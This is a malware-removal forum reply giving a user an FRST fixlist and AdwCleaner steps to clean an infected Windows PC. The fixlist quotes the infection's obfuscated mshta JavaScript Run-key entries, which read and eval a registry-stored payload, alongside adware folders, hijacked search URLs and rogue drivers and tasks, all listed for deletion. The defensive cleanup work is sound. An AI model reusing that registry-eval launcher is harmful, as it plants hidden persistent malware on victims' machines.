Hi, this looks like something new, so when you have completed the fix, could I have a fresh FRST scan please?
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open Notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [gmsd_gb_005010023] => [X]
HKLM-x32\...\Run: [**b5ece8a9<*>] => mshta javascript:Mml0EpM="a";w9N=new%20ActiveXObject("WScript.Shell");azsWhPH9c="GA";D2TB8V=w9N.RegRead("HKLM\\software\\Wow6432Node\\817f9077\\9364e27d");FVT2p8EbN="6SEkU";eval(D2TB8V);eVBVxi05w="189 (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [gmsd_gb_002030026] => [X]
HKU\S-1-5-18\...\Run: [**b5ece8a9<*>] => mshta javascript:UOTG80XHy="A";o8j=new%20ActiveXObject("WScript.Shell");BR3ISZB4="Wx2yMPvE";rbJM9=o8j.RegRead("HKCU\\software\\817f9077\\9364e27d");lv6ddkj="8IUKMkeA";eval(rbJM9);uEFdzI8="inNiyXLQr"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2193330594-1523224260-2583000878-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com/?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=55&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&SSPV=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=58&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - No File
S4 zejytose; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\jnsh73EE.tmp [199168 2015-07-10] () [File not signed]
S4 nosepoze; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\knsc563B.tmpfs [X]
R1 {699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64; C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys [48784 2015-07-12] (StdLib)
S1 innfd_1_10_0_14; system32\drivers\innfd_1_10_0_14.sys [X]
2015-07-13 13:35 - 2015-07-13 13:35 - 00002476 _____ C:\Users\magicbrew\Desktop\Reimage2.lnk
2015-07-13 13:10 - 2015-07-12 22:00 - 00048784 _____ (StdLib) C:\Windows\system32\Drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
2015-07-13 09:41 - 2015-07-13 09:52 - 00089365 _____ C:\ProgramData\L3553OBf.dat
2015-07-10 16:42 - 2015-07-13 13:02 - 00000000 ____D C:\Program Files (x86)\gmsd_gb_002030026
2015-07-10 16:42 - 2015-07-10 16:42 - 00003118 _____ C:\Windows\System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8}
2015-07-10 10:26 - 2015-07-13 09:41 - 00000000 ____D C:\ProgramData\abc
2015-07-07 17:35 - 2015-07-13 12:35 - 00000000 ____D C:\Program Files (x86)\CinemaPlus-3.2cV07.07
2015-07-07 17:35 - 2015-07-13 09:44 - 00000004 _____ C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Users\magicbrew\AppData\Local\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\c715af32-1dba-4665-97b0-d821aa5cac1c
2015-07-07 17:34 - 2015-07-13 12:34 - 00000000 ____D C:\Program Files (x86)\Coupoon
2015-07-07 17:34 - 2015-07-07 17:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\Crossbrowse
2015-07-07 17:33 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\SmartWeb
2015-07-07 17:29 - 2015-07-07 17:29 - 00000000 ____D C:\Users\magicbrew\Documents\Any Video Converter
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\Anvsoft
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2015-07-07 17:28 - 2015-07-07 17:28 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\OpenCandy
2015-07-07 17:20 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58
2015-07-07 16:42 - 2015-07-07 16:42 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieUserList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieSiteList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieBrowserModeList
2014-12-02 12:21 - 2014-12-02 12:21 - 0000037 ___SH () C:\Users\magicbrew\AppData\Roaming\3491672254e498b9d1dc6f1.41918858
2015-07-13 09:41 - 2015-07-13 09:52 - 0089365 _____ () C:\ProgramData\L3553OBf.dat
Task: {15011F61-317C-4C6E-B9CC-BE3D69FC7EF6} - \0be795aa-89f8-4c7a-9398-1041b523595d-7 No Task File <==== ATTENTION
Task: {1BD5DD3B-034C-404D-A865-43F5A9A3D8A4} - System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8} => pcalua.exe -a C:\PROGRA~2\SearchProtect\Main\bin\uninstall.exe -c /S <==== ATTENTION
Task: {1C675159-F615-4178-BDA2-661B02F80695} - \0be795aa-89f8-4c7a-9398-1041b523595d-10_user No Task File <==== ATTENTION
Task: {3698927B-EA05-4575-B552-EB753A7B98DF} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-6 No Task File <==== ATTENTION
Task: {3D338D15-AA7D-44DD-9AA0-372968117ACD} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-7 No Task File <==== ATTENTION
Task: {3DB89CD6-34E7-41C7-8229-546728E14DB5} - \CreateChoiceProcessTask No Task File <==== ATTENTION
Task: {42D26C8B-DD80-462E-98D8-DA6D742BC71E} - \0be795aa-89f8-4c7a-9398-1041b523595d-3 No Task File <==== ATTENTION
Task: {9F0B38CD-7EBC-4491-9456-2FC16171043E} - \0be795aa-89f8-4c7a-9398-1041b523595d-5 No Task File <==== ATTENTION
Task: {A02824C8-9D89-4F64-92EF-547A9C0616DC} - System32\Tasks\ProPCCleaner_Popup => C:\Program Files (x86)\Pro PC Cleaner\Splash.exe <==== ATTENTION
Task: {A6AF9D85-7F9A-476D-95F0-49FC3D51711D} - \0be795aa-89f8-4c7a-9398-1041b523595d-5_user No Task File <==== ATTENTION
Task: {E6C0A9FE-C0BF-4860-A45E-1701C67BC76B} - \PC SpeedUp Service Deactivator No Task File <==== ATTENTION
Task: {F0E841B2-7008-49CC-B4ED-BE8F5F76A920} - System32\Tasks\ProPCCleaner_Start => C:\Program Files (x86)\Pro PC Cleaner\ProPCCleaner.exe <==== ATTENTION
Task: {F1D93A0E-ED45-4FF7-8D26-42E20408A045} - \0be795aa-89f8-4c7a-9398-1041b523595d-6 No Task File <==== ATTENTION
Task: {FAC3FEDE-18BE-498C-B23D-0E6CD1ADF476} - \SmartWeb Upgrade Trigger Task No Task File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Microsoft:QcOdGCxHYBG4TkN7XblHwOl03ccj
AlternateDataStreams: C:\ProgramData\Microsoft:tXBgMqmC0uFWziwQrJ5GM6A7Ouis
AlternateDataStreams: C:\ProgramData\PACE:769ABF6D611ED68D
AlternateDataStreams: C:\Users\magicbrew\Cookies:gv1yIDMJyN4dl5RY
AlternateDataStreams: C:\Users\magicbrew\Cookies:L0LGLDSGlbNUjxSPWvA8KYn9jt
AlternateDataStreams: C:\Users\magicbrew\Local Settings:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\Local Settings:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\hPkIakbtz61q:Zk0qrQeyENrPfsOIfIT1vtF
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temp:W7sJktx3CgzjNuxON43o9
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:gI0Cm4QLLW8Ky07opwOnfQ
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:z6zlAqiYS6ilphADGZa
C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt in the same location as FRST.exe.
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix.
On completion a log will be generated; please post that.
THEN
Please download AdwCleaner by Xplode onto your desktop.
- Close all open programs and internet browsers.
- Double click on AdwCleaner.exe to run the tool.
- Click on Scan.
- After the scan is complete click on “Clean”.
- Confirm each time with Ok.
- Your computer will be rebooted automatically. A text file will open after the restart.
- Please post the content of that logfile with your next answer.
- You can find the logfile at C:\AdwCleaner[S0].txt as well.